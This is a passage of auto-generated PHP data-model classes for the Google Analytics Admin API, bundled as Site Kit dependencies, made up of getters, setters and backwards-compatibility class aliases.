function setRowCount($rowCount) { $this->rowCount = $rowCount; } /** * @return int */ public function getRowCount() { return $this->rowCount; } /** * @param GoogleAnalyticsAdminV1betaAccessRow[] */ public function setRows($rows) { $this->rows = $rows; } /** * @return GoogleAnalyticsAdminV1betaAccessRow[] */ public function getRows() { return $this->rows; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaRunAccessReportResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaRunAccessReportResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaConversionEvent extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $createTime; /** * @var bool */ public $custom; /** * @var bool */ public $deletable; /** * @var string */ public $eventName; /** * @var string */ public $name; /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param bool */ public function setCustom($custom) { $this->custom = $custom; } /** * @return bool */ public function getCustom() { return $this->custom; } /** * @param bool */ public function setDeletable($deletable) { $this->deletable = $deletable; } /** * @return bool */ public function getDeletable() { return $this->deletable; } /** * @param string */ public function setEventName($eventName) { $this->eventName = $eventName; } /** * @return string */ public function getEventName() { return $this->eventName; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaConversionEvent::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaConversionEvent'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListWebDataStreamsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'webDataStreams'; /** * @var string */ public $nextPageToken; protected $webDataStreamsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaWebDataStream::class; protected $webDataStreamsDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param GoogleAnalyticsAdminV1alphaWebDataStream[] */ public function setWebDataStreams($webDataStreams) { $this->webDataStreams = $webDataStreams; } /** * @return GoogleAnalyticsAdminV1alphaWebDataStream[] */ public function getWebDataStreams() { return $this->webDataStreams; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListWebDataStreamsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListWebDataStreamsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterInListFilter extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'values'; /** * @var bool */ public $caseSensitive; /** * @var string[] */ public $values; /** * @param bool */ public function setCaseSensitive($caseSensitive) { $this->caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string[] */ public function setValues($values) { $this->values = $values; } /** * @return string[] */ public function getValues() { return $this->values; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterInListFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterInListFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaNumericValue extends \Google\Site_Kit_Dependencies\Google\Model { public $doubleValue; /** * @var string */ public $int64Value; public function setDoubleValue($doubleValue) { $this->doubleValue = $doubleValue; } public function getDoubleValue() { return $this->doubleValue; } /** * @param string */ public function setInt64Value($int64Value) { $this->int64Value = $int64Value; } /** * @return string */ public function getInt64Value() { return $this->int64Value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaNumericValue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaNumericValue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaNumericValue extends \Google\Site_Kit_Dependencies\Google\Model { public $doubleValue; /** * @var string */ public $int64Value; public function setDoubleValue($doubleValue) { $this->doubleValue = $doubleValue; } public function getDoubleValue() { return $this->doubleValue; } /** * @param string */ public function setInt64Value($int64Value) { $this->int64Value = $int64Value; } /** * @return string */ public function getInt64Value() { return $this->int64Value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaNumericValue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaNumericValue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListDataStreamsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'dataStreams'; protected $dataStreamsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataStream::class; protected $dataStreamsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1alphaDataStream[] */ public function setDataStreams($dataStreams) { $this->dataStreams = $dataStreams; } /** * @return GoogleAnalyticsAdminV1alphaDataStream[] */ public function getDataStreams() { return $this->dataStreams; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListDataStreamsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListDataStreamsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaGoogleAdsLink extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $adsPersonalizationEnabled; /** * @var bool */ public $canManageClients; /** * @var string */ public $createTime; /** * @var string */ public $creatorEmailAddress; /** * @var string */ public $customerId; /** * @var string */ public $name; /** * @var string */ public $updateTime; /** * @param bool */ public function setAdsPersonalizationEnabled($adsPersonalizationEnabled) { $this->adsPersonalizationEnabled = $adsPersonalizationEnabled; } /** * @return bool */ public function getAdsPersonalizationEnabled() { return $this->adsPersonalizationEnabled; } /** * @param bool */ public function setCanManageClients($canManageClients) { $this->canManageClients = $canManageClients; } /** * @return bool */ public function getCanManageClients() { return $this->canManageClients; } /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param string */ public function setCreatorEmailAddress($creatorEmailAddress) { $this->creatorEmailAddress = $creatorEmailAddress; } /** * @return string */ public function getCreatorEmailAddress() { return $this->creatorEmailAddress; } /** * @param string */ public function setCustomerId($customerId) { $this->customerId = $customerId; } /** * @return string */ public function getCustomerId() { return $this->customerId; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setUpdateTime($updateTime) { $this->updateTime = $updateTime; } /** * @return string */ public function getUpdateTime() { return $this->updateTime; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaGoogleAdsLink::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaGoogleAdsLink'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaListGoogleAdsLinksResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'googleAdsLinks'; protected $googleAdsLinksType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaGoogleAdsLink::class; protected $googleAdsLinksDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1betaGoogleAdsLink[] */ public function setGoogleAdsLinks($googleAdsLinks) { $this->googleAdsLinks = $googleAdsLinks; } /** * @return GoogleAnalyticsAdminV1betaGoogleAdsLink[] */ public function getGoogleAdsLinks() { return $this->googleAdsLinks; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListGoogleAdsLinksResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaListGoogleAdsLinksResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaDataRetentionSettings extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $eventDataRetention; /** * @var string */ public $name; /** * @var bool */ public $resetUserDataOnNewActivity; /** * @param string */ public function setEventDataRetention($eventDataRetention) { $this->eventDataRetention = $eventDataRetention; } /** * @return string */ public function getEventDataRetention() { return $this->eventDataRetention; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param bool */ public function setResetUserDataOnNewActivity($resetUserDataOnNewActivity) { $this->resetUserDataOnNewActivity = $resetUserDataOnNewActivity; } /** * @return bool */ public function getResetUserDataOnNewActivity() { return $this->resetUserDataOnNewActivity; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataRetentionSettings::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaDataRetentionSettings'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaProvisionAccountTicketRequest extends \Google\Site_Kit_Dependencies\Google\Model { protected $accountType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccount::class; protected $accountDataType = ''; /** * @var string */ public $redirectUri; /** * @param GoogleAnalyticsAdminV1betaAccount */ public function setAccount(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccount $account) { $this->account = $account; } /** * @return GoogleAnalyticsAdminV1betaAccount */ public function getAccount() { return $this->account; } /** * @param string */ public function setRedirectUri($redirectUri) { $this->redirectUri = $redirectUri; } /** * @return string */ public function getRedirectUri() { return $this->redirectUri; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProvisionAccountTicketRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaProvisionAccountTicketRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaChangeHistoryEvent extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'changes'; /** * @var string */ public $actorType; /** * @var string */ public $changeTime; protected $changesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaChangeHistoryChange::class; protected $changesDataType = 'array'; /** * @var bool */ public $changesFiltered; /** * @var string */ public $id; /** * @var string */ public $userActorEmail; /** * @param string */ public function setActorType($actorType) { $this->actorType = $actorType; } /** * @return string */ public function getActorType() { return $this->actorType; } /** * @param string */ public function setChangeTime($changeTime) { $this->changeTime = $changeTime; } /** * @return string */ public function getChangeTime() { return $this->changeTime; } /** * @param GoogleAnalyticsAdminV1betaChangeHistoryChange[] */ public function setChanges($changes) { $this->changes = $changes; } /** * @return GoogleAnalyticsAdminV1betaChangeHistoryChange[] */ public function getChanges() { return $this->changes; } /** * @param bool */ public function setChangesFiltered($changesFiltered) { $this->changesFiltered = $changesFiltered; } /** * @return bool */ public function getChangesFiltered() { return $this->changesFiltered; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setUserActorEmail($userActorEmail) { $this->userActorEmail = $userActorEmail; } /** * @return string */ public function getUserActorEmail() { return $this->userActorEmail; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaChangeHistoryEvent::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaChangeHistoryEvent'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAuditUserLink extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'effectiveRoles'; /** * @var string[] */ public $directRoles; /** * @var string[] */ public $effectiveRoles; /** * @var string */ public $emailAddress; /** * @var string */ public $name; /** * @param string[] */ public function setDirectRoles($directRoles) { $this->directRoles = $directRoles; } /** * @return string[] */ public function getDirectRoles() { return $this->directRoles; } /** * @param string[] */ public function setEffectiveRoles($effectiveRoles) { $this->effectiveRoles = $effectiveRoles; } /** * @return string[] */ public function getEffectiveRoles() { return $this->effectiveRoles; } /** * @param string */ public function setEmailAddress($emailAddress) { $this->emailAddress = $emailAddress; } /** * @return string */ public function getEmailAddress() { return $this->emailAddress; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAuditUserLink::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAuditUserLink'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaListPropertiesResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'properties'; /** * @var string */ public $nextPageToken; protected $propertiesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProperty::class; protected $propertiesDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param GoogleAnalyticsAdminV1betaProperty[] */ public function setProperties($properties) { $this->properties = $properties; } /** * @return GoogleAnalyticsAdminV1betaProperty[] */ public function getProperties() { return $this->properties; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListPropertiesResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaListPropertiesResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalRequest extends \Google\Site_Kit_Dependencies\Google\Model { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListPropertiesResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'properties'; /** * @var string */ public $nextPageToken; protected $propertiesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaProperty::class; protected $propertiesDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param GoogleAnalyticsAdminV1alphaProperty[] */ public function setProperties($properties) { $this->properties = $properties; } /** * @return GoogleAnalyticsAdminV1alphaProperty[] */ public function getProperties() { return $this->properties; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListPropertiesResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListPropertiesResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaListConversionEventsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'conversionEvents'; protected $conversionEventsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaConversionEvent::class; protected $conversionEventsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1betaConversionEvent[] */ public function setConversionEvents($conversionEvents) { $this->conversionEvents = $conversionEvents; } /** * @return GoogleAnalyticsAdminV1betaConversionEvent[] */ public function getConversionEvents() { return $this->conversionEvents; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListConversionEventsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaListConversionEventsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaBatchGetUserLinksResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'userLinks'; protected $userLinksType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink::class; protected $userLinksDataType = 'array'; /** * @param GoogleAnalyticsAdminV1alphaUserLink[] */ public function setUserLinks($userLinks) { $this->userLinks = $userLinks; } /** * @return GoogleAnalyticsAdminV1alphaUserLink[] */ public function getUserLinks() { return $this->userLinks; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchGetUserLinksResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaBatchGetUserLinksResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinksResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'displayVideo360AdvertiserLinks'; protected $displayVideo360AdvertiserLinksType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink::class; protected $displayVideo360AdvertiserLinksDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink[] */ public function setDisplayVideo360AdvertiserLinks($displayVideo360AdvertiserLinks) { $this->displayVideo360AdvertiserLinks = $displayVideo360AdvertiserLinks; } /** * @return GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink[] */ public function getDisplayVideo360AdvertiserLinks() { return $this->displayVideo360AdvertiserLinks; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinksResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinksResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionResponse extends \Google\Site_Kit_Dependencies\Google\Model { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionResponse::class, 